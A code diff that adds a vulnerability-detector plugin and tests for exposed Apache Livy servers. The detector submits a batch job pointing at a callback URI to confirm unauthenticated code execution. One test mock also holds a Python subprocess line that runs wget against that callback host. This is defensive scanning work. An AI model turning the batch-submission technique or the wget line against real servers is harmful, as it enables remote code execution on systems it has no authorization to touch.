Merge pull request #686 from joernNNN:livy-exposed-ui

PiperOrigin-RevId: 880870346
Change-Id: Iea8ae1eca17c4da4f107042e69078ac5e534d39a

Author: copybara-github

templated/templateddetector/plugins/exposedui/ApacheLivy_ExposedUI.textproto

@@ -0,0 +1,107 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+  type: VULN_DETECTION
+  name: "ApacheLivy_ExposedUI"
+  author: "joernNNN"
+  version: "0.1"
+}
+
+finding: {
+  main_id: {
+    publisher: "GOOGLE"
+    value: "APACHELIVY_EXPOSED_UI"
+  }
+  title: "Apache Livy Exposed instance"
+  description: "Apache Livy instance is exposed and can be used to compromise the system."
+  recommendation:
+    "Configure authentication or ensure the Apache Livy instance is not exposed "
+    "to the network. See "
+    "https://livy.apache.org/get-started/ for details."
+  severity: CRITICAL
+}
+
+###########
+# ACTIONS #
+###########
+
+actions: {
+  name: "livy_exposed_ui_fingerprint"
+  http_request: {
+    method: GET
+    uri: "/ui"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: { body {} contains: '<title>Livy - Sessions</title>' }
+      }
+    }
+  }
+}
+
+actions: {
+  name: "create_batches"
+  http_request: {
+    method: POST
+    uri: "/batches"
+    headers: [
+      { name: "Content-Type" value: "application/json" }
+    ]
+    data: '{"file":"{{ T_CBS_URI }}"}'
+    response: {
+      http_status: 201
+      expect_all: {
+        conditions: { body {} contains: '"proxyUser"' }
+        conditions: { body {} contains: '"sparkUiUrl"' }
+      }
+      extract_all: {
+        patterns: [
+          {
+            from_body: {}
+            regexp: "\"id\":([0-9]+),"
+            variable_name: "batch_id"
+          }
+        ]
+      }
+    }
+  }
+  cleanup_actions: "cleanup_batches"
+}
+
+actions: {
+  name: "cleanup_batches"
+  http_request: {
+    method: DELETE
+    uri: "/batches/{{ batch_id }}"
+    response: {
+      http_status: 200
+    }
+  }
+}
+
+actions: {
+  name: "sleep_for_callback"
+  utility: { sleep: { duration_ms: 4000 } }
+}
+actions: {
+  name: "check_callback_server_logs"
+  callback_server: { action_type: CHECK }
+}
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+  actions: [
+    "livy_exposed_ui_fingerprint",
+    "create_batches",
+    "sleep_for_callback",
+    "check_callback_server_logs"
+  ]
+}

templated/templateddetector/plugins/exposedui/ApacheLivy_ExposedUI_test.textproto

@@ -0,0 +1,101 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+  tested_plugin: "ApacheLivy_ExposedUI"
+}
+
+tests: {
+  name: "whenVulnerable_returnsVuln"
+  expect_vulnerability: true
+
+  mock_callback_server: {
+    enabled: true
+    has_interaction: true
+  }
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/ui"
+        status: 200
+        body_content: '<title>Livy - Sessions</title>'
+      },
+      {
+        uri: "/batches"
+        status: 201
+        body_content:
+          '{"id":6,"name":null,"owner":null,"proxyUser":null,"state":"running","appId":null,"appInfo":{"driverLogUrl":null,"sparkUiUrl":null},"log":["stdout: ","\nstderr: "]}'
+        condition: {
+          body_content: '{"file":"{{ T_CBS_URI }}"}'
+          headers: [
+            {
+              name: "Content-Type",
+              value: "application/json"
+            }
+          ]
+        }
+      },
+      {
+        uri: "/batches/6"
+        status: 200
+      }
+    ]
+  }
+}
+
+
+tests: {
+  name: "whenNotApcheLivy_returnsNoVuln"
+  expect_vulnerability: false
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri:  "/api/v1/main/usages/all"
+        status: 400
+        body_content: "..."
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNoCallback_returnsFalse"
+  expect_vulnerability: false
+
+  mock_callback_server: {
+    enabled: true
+    has_interaction: false
+  }
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/ui"
+        status: 200
+        body_content: '<title>Livy - Sessions</title>'
+      },
+      {
+        uri: "/batches"
+        status: 201
+        body_content:
+            '{"id":6,"name":null,"owner":null,"proxyUser":null,"state":"running","appId":null,"appInfo":{"driverLogUrl":null,"sparkUiUrl":null},"log":["stdout: ","\nstderr: "]}'
+        condition: {
+          body_content: '{"file":"{{ T_CBS_URI }}"}'
+          headers: [
+            {
+              name: "Content-Type",
+              value: "application/json"
+            }
+          ]
+        }
+      },
+      {
+        uri: "/batches/6"
+        status: 200
+        body_content:
+            '{"id":0,"code":"import subprocess\\nsubprocess.run([\\"wget\\",\\"{{ T_CBS_URI }}\\"])","state":"available","output":{"status":"ok","execution_count":0,"data":{"text/plain":"/opt"}},"progress":1.0,"started":1754515902001,"completed":1754515902003}'
+      }
+    ]
+  }
+}